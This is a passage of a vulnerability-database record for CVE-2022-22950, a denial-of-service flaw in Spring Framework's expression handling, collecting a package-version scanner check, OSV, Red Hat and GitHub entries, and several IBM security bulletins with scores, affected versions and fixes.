pkg['exists_check'];\n if (reference &&\n _release &&\n rhel_decide_repo_relative_url_check(required_repo_url_list:repo_relative_urls) &&\n (applicable_repo_urls || (!exists_check || rpm_exists(release:_release, rpm:exists_check))) &&\n rpm_check(release:_release, sp:sp, cpu:_cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n var extra = NULL;\n if (empty_or_null(applicable_repo_urls)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n var tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'apache-commons-compress / apache-commons-compress-javadoc / etc');\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}], "osv": [{"lastseen": "2023-04-11T01:18:22", "description": "In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-03T00:01:00", "type": "osv", "title": "Allocation of Resources Without Limits or Throttling in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-04-11T01:18:17", "id": "OSV:GHSA-558X-2XJG-6232", "href": "https://osv.dev/vulnerability/GHSA-558x-2xjg-6232", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "redhatcve": [{"lastseen": "2023-06-09T14:51:21", "description": "A flaw was found in the Spring Framework. This flaw allows an attacker to craft a special Spring Expression, causing a denial of service.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-03-28T21:07:31", "type": "redhatcve", "title": "CVE-2022-22950", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-04-06T09:43:08", "id": "RH:CVE-2022-22950", "href": "https://access.redhat.com/security/cve/cve-2022-22950", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "github": [{"lastseen": "2023-06-09T14:43:34", "description": "In Spring Framework versions 5.3.0 - 5.3.16, 5.2.0.RELEASE - 5.2.19.RELEASE, and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-04-03T00:01:00", "type": "github", "title": "Allocation of Resources Without Limits or Throttling in Spring Framework", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-03-28T22:26:11", "id": "GHSA-558X-2XJG-6232", "href": "https://github.com/advisories/GHSA-558x-2xjg-6232", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}], "ibm": [{"lastseen": "2023-06-09T17:35:12", "description": "## Summary\n\nIn Spring Framework versions 5.3.0 - 5.3.16 and older unsupported versions, it is possible for a user to provide a specially crafted SpEL expression that may cause a denial of service condition. This effects ITNCM version 6.4.2.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nITNCM| 6.4.2 \n \n\n\n## Remediation/Fixes\n\nThis issue has been fixed in ITNCM Fix Pack 18 and which is available in the following location in fix central. \n\nAIX, Linux, Linux zSeries : [6.4.2-TIV-ITNCM-FP018 ](<https://www.ibm.com/support/fixcentral/swg/selectFixes?product=ibm%2FTivoli%2FTivoli+Netcool+Configuration+Manager&fixids=6.4.2-TIV-ITNCM-FP018&source=SAR&function=fixId&parent=ibm/Tivoli> \"\" )\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-06-06T04:57:17", "type": "ibm", "title": "Security Bulletin: [All] Spring Framework - CVE-2022-22950 (Publicly disclosed vulnerability)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-06-06T04:57:17", "id": "6C544B97B62B9464D51C78F9B268DAFEF4ADE09A38B1D9BEF0D8564D5CC42D88", "href": "https://www.ibm.com/support/pages/node/7001553", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T21:44:45", "description": "## Summary\n\nIBM Tivoli Monitoring is affected but not classified as vulnerable to a remote code execution in Spring Framework (CVE-2022-22950). The Tivoli Enterprise Portal Server (CQ) component includes but does not use it. The fix removes Spring from the product.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Tivoli Monitoring| 6.3.0 - 6.3.0.7 (up to 6.3.0.7 Service pack 10) \n \n\n\n## Remediation/Fixes\n\nFix Name| VRMF| Remediation/Fix Download \n---|---|--- \n6.3.0.7-TIV-ITM-SP0012| 6.3.0.7 Fix Pack 7 Service Pack 12| <https://www.ibm.com/support/pages/ibm-tivoli-monitoring-630-fix-pack-7-service-pack-12-6307-tiv-itm-sp0012> \nThe fix requires the system is at 630 Fix pack 7 or later as a prerequisite. \n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-12-30T17:31:59", "type": "ibm", "title": "Security Bulletin: IBM Tivoli Monitoring is affected but not classified as vulnerable by a denial of service in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-12-30T17:31:59", "id": "471BEEF44DE6C27461378C7D110744F38E295FB10C4A50D100750E5E0D7941A0", "href": "https://www.ibm.com/support/pages/node/6579161", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T21:56:26", "description": "## Summary\n\nIBM Planning Analytics Workspace is affected by multiple vulnerabilites. Spring is used in IBM Planning Analytics Workspace in Server Side Rest APIs as an indirect dependency by MongoDB that is used to store content (CVE-2022-22950). FasterXML jackson-databind is used in IBM Planning Analytics Workspace to parse and generate json files (XFID: 217968). \n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L) \n \n** IBM X-Force ID: **217968 \n** DESCRIPTION: **FasterXML jackson-databind is vulnerable to a denial of service, caused by an error when using JDK serialization to serialize and deserialize JsonNode values. By sending a specially crafted request, an attacker could exploit this vulnerability to cause a denial of service. \nCVSS Base score: 5.9 \nCVSS Temporal Score: See: [https://exchange.xforce.ibmcloud.com/vulnerabilities/217968 ](<https://exchange.xforce.ibmcloud.com/vulnerabilities/217968>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\n## Affected Products and Versions\n\nIBM Planning Analytics Workspace 2.0\n\n## Remediation/Fixes\n\nIt is strongly recommended that you apply the most recent security updates:\n\n[Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central ](<https://www.ibm.com/support/pages/node/6584994> \"Download IBM Planning Analytics Local v2.0 - Planning Analytics Workspace Release 76 from Fix Central\" ) \n \n\n\nThis Security Bulletin is applicable to IBM Planning Analytics 2.0 on premise offerings. The vulnerabilities listed above have been addressed on IBM Planning Analytics with Watson and no further action is required.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-13T17:08:13", "type": "ibm", "title": "Security Bulletin: IBM Planning Analytics Workspace is affected by multiple vulnerabilities (CVE-2022-22950, XFID:217968)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-05-13T17:08:13", "id": "933F16C198EDF616BD60B2C55B4AE9B642F3BD83CA146DEBB0E52EC9050248AF", "href": "https://www.ibm.com/support/pages/node/6579613", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T21:43:58", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to a denial of service, caused by improper input validation in VMware Tanzu Spring Framework (CVE-2022-22950). Spring Framework is used in Watson Speech Services to build our STT and TTS java services Please read the details for remediation below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.0.0 - 4.0.8 \n \n\n\n## Remediation/Fixes\n\n \n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \n**IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data**| **4.0.9**| **The fix in 4.0.9 applies to all versions listed (4.0.0-4.0.8). Version 4.0.9 can be downloaded and installed from: \n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions> \n** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to improper input validation in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-01-12T21:59:00", "id": "8D1FFB0AFC90D6F732CB992E0BDEB82F435593D96A68A03F6DD265E83892C473", "href": "https://www.ibm.com/support/pages/node/6591499", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T21:44:06", "description": "## Summary\n\nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to a denial of service, caused by improper input validation in VMware Tanzu Spring Framework (CVE-2022-22950). This appears in the Java code used by some of our service components. Please read the details for remediation below.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Speech Services Cartridge for IBM Cloud Pak for Data| 4.0.0 - 4.0.8 \n \n\n\n## Remediation/Fixes\n\n**Product(s)**| **Version(s) \n**| **Remediation/Fix/Instructions** \n---|---|--- \n**IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data**| **4.0.9**| **The fix in 4.0.9 applies to all versions listed (4.0.0-4.0.8). Version 4.0.9 can be downloaded and installed from: \n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=planning-operator-operand-versions> \n** \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2023-01-12T21:59:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Speech Services Cartridge for IBM Cloud Pak for Data is vulnerable to a denial of service, caused by improper input validation with Spring Framework (CVE-2022-22950).", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2023-01-12T21:59:00", "id": "A97F6751F71164D0A07AD868814BD46D147EF591C7234360EA8F62B2317AA675", "href": "https://www.ibm.com/support/pages/node/6593865", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T21:56:43", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data is affected but not vulnerable to a denial of service in Spring Framework (CVE-2022-22950) Spring Framework is used by IBM Watson Assistant for IBM Cloud Pak for Data as part of its developement infrastructure. The fix includes Spring version 5.3.18, 5.2.20 or later.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Assistant for IBM Cloud Pack for Data| 1.5.0, 4.0.0. 4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7 \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.0.8) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.8| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.8 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-06T23:10:16", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is affected but not classified as vulnerable to a denial of service in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-05-06T23:10:16", "id": "1EA754AFF092ED1712E3DBFA763C4962C7EF40031818AB374A5E52A9E9586AAD", "href": "https://www.ibm.com/support/pages/node/6583755", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T21:56:45", "description": "## Summary\n\nIBM Watson Assistant for IBM Cloud Pak for Data is affected but not vulnerable to a denial of service in Spring Framework (CVE-2022-22950) Spring Framework is used by IBM Watson Assistant for IBM Cloud Pak for Data as part of its developement infrastructure. The fix includes Spring version 5.3.18, 5.2.20 or later.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\nAffected Product(s)| Version(s) \n---|--- \nIBM Watson Assistant for IBM Cloud Pack for Data| 1.5.0, 4.0.0. 4.0.2, 4.0.4, 4.0.5, 4.0.6, 4.0.7 \n \n\n\n## Remediation/Fixes\n\nFor all affected versions, IBM strongly recommends addressing the vulnerability now by upgrading to the latest (v4.0.8) release of IBM Watson Assistant for IBM Cloud Pak for Data which maintains backward compatibility with the versions listed above. \n\n**Product Latest Version**| **Remediation/Fix/Instructions** \n---|--- \nIBM Watson Assistant for IBM Cloud Pak for Data 4.0.8| \n\nFollow instructions for Installing Watson Assistant in Link to Release (v4.0.8 release information)\n\n<https://www.ibm.com/docs/en/cloud-paks/cp-data/4.0?topic=assistant-installing-watson> \n \n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2022-05-06T23:17:00", "type": "ibm", "title": "Security Bulletin: IBM Watson Assistant for IBM Cloud Pak for Data is affected but not classified as vulnerable to a denial of service in Spring Framework (CVE-2022-22950)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22950"], "modified": "2022-05-06T23:17:00", "id": "67BA75B2F60B75FF432F4A7CBDBC2D43DE52B633C04D3C54ADA035D39D2605F7", "href": "https://www.ibm.com/support/pages/node/6583815", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:N/I:N/A:P"}}, {"lastseen": "2023-06-07T21:47:42", "description": "## Summary\n\nIBM Sterilng B2B Integrator has addressed security vulnerabilities in Spring Framework.\n\n## Vulnerability Details\n\n** CVEID: **[CVE-2021-22096](<https://vulners.com/cve/CVE-2021-22096>) \n** DESCRIPTION: **VMware Spring Framework could allow a remote attacker to bypass security restrictions. By sending a specially-crafted input, an attacker could exploit this vulnerability to cause the insertion of additional log entries. \nCVSS Base score: 5.3 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/212430](<https://exchange.xforce.ibmcloud.com/vulnerabilities/212430>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N) \n \n** CVEID: **[CVE-2022-22950](<https://vulners.com/cve/CVE-2022-22950>) \n** DESCRIPTION: **VMware Tanzu Spring Framework is vulnerable to a denial of service, caused by improper input validation. By sending a specially-crafted crafted SpEL expression, a remote attacker could exploit this vulnerability to cause a denial of service condition. \nCVSS Base score: 5.4 \nCVSS Temporal Score: See: [ https://exchange.xforce.ibmcloud.com/vulnerabilities/223096](<https://exchange.xforce.ibmcloud.com/vulnerabilities/223096>) for the current score. \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L)\n\n## Affected Products and Versions\n\n**Affected Product(s)**| **Version(s)** \n---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6 \nIBM Sterling B2B Integrator| 6.1.0.0 - 6.1.0.5, 6..1.1.0 - 6.1.1.1 \n \n\n\n## Remediation/Fixes\n\n** Product**| **Version**| **APAR**| **Remediation & Fix** \n---|---|---|--- \nIBM Sterling B2B Integrator| 6.0.0.0 - 6.0.3.6| IT41291| Apply 